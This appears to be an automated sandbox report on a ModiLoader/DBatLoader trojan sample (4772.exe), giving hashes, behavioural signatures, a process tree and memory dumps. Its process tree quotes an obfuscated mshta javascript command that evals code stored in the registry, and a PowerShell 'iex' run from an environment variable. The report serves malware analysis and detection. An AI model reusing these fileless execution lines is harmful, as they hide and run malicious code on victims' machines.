Overview

overview

10

Static

static

3

221b9.exe

windows10-2004-x64

10

2c42a36d7.exe

windows10-2004-x64

10

2da5f7422573.exe

windows10-2004-x64

3

3fcc16.exe

windows10-2004-x64

3

4772.exe

windows10-2004-x64

10

6c1a.exe

windows10-2004-x64

10

79330.exe

windows10-2004-x64

10

afc500c.exe

windows10-2004-x64

8

ef62b5a6474.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    140s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/03/2025, 18:44

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    4772.exe

  • Size

    334KB

  • MD5

    a11ae57c068442f751c4a7f4f5f542b0

  • SHA1

    131eaded2b2507fa0b1fbf5677705a09496d0f4c

  • SHA256

    761f42f03e50ef9b2eb1b1041c81cc6ed24cbc8ce2d6df3c87f193493b4a4772

  • SHA512

    c62d70a3391f30cd5084d8ca4cfe0bdc65205205ac3913d4f9a9af847e1f224a780b3ddb4e981e105dd1dde6a1d52d628c6bb5380901f357156e3063dde2e674

  • SSDEEP

    6144:5P8U5dPZDa/iuqO2pi14MlxYSCG1H95dp4kq5bx4fbJr/CYzCIbeY3opBMc:F5VZDaj5xZC2dGkebubJr/CIbbopBp

Score
10/10
modiloaderdiscoveryexecutiontrojan

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

    trojanmodiloader
  • Modiloader family
    modiloader
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ModiLoader Second Stage 9 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4772.exe
    "C:\Users\Admin\AppData\Local\Temp\4772.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    PID:1432
  • C:\Windows\system32\mshta.exe
    "C:\Windows\system32\mshta.exe" javascript:le6eSgCF="vkeBf7";L1o6=new%20ActiveXObject("WScript.Shell");A3eyf9RQR="4POBVXy";o1qeI5=L1o6.RegRead("HKCU\\software\\QYrnaXu\\rwSB9v5");w6o4MRAp="yil";eval(o1qeI5);loS9WF="8Tazf";
    1⤵
    • Process spawned unexpected child process
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1916
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:yxcn
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4820

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2jtwsz0y.fnc.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/1432-4-0x00000000022E0000-0x00000000023BC000-memory.dmp

    Filesize

    880KB

    Download

  • memory/1432-1-0x0000000000400000-0x000000000045C5E8-memory.dmp

    Filesize

    369KB

    Download

  • memory/1432-5-0x00000000022E0000-0x00000000023BC000-memory.dmp

    Filesize

    880KB

    Download

  • memory/1432-6-0x00000000022E0000-0x00000000023BC000-memory.dmp

    Filesize

    880KB

    Download

  • memory/1432-0-0x0000000000453000-0x0000000000455000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1432-3-0x0000000000400000-0x000000000045C5E8-memory.dmp

    Filesize

    369KB

    Download

  • memory/1432-7-0x00000000022E0000-0x00000000023BC000-memory.dmp

    Filesize

    880KB

    Download

  • memory/1432-8-0x00000000022E0000-0x00000000023BC000-memory.dmp

    Filesize

    880KB

    Download

  • memory/1432-9-0x00000000022E0000-0x00000000023BC000-memory.dmp

    Filesize

    880KB

    Download

  • memory/1432-30-0x0000000000453000-0x0000000000455000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1432-2-0x00000000022E0000-0x00000000023BC000-memory.dmp

    Filesize

    880KB

    Download

  • memory/4820-13-0x0000000005B90000-0x0000000005BB2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4820-12-0x0000000005BF0000-0x0000000006218000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/4820-15-0x0000000006400000-0x0000000006466000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4820-14-0x0000000006390000-0x00000000063F6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4820-25-0x0000000006470000-0x00000000067C4000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/4820-26-0x0000000006940000-0x000000000695E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/4820-27-0x00000000069E0000-0x0000000006A2C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/4820-28-0x0000000008130000-0x00000000087AA000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/4820-29-0x0000000006E60000-0x0000000006E7A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/4820-11-0x0000000005580000-0x00000000055B6000-memory.dmp

    Filesize

    216KB

    Download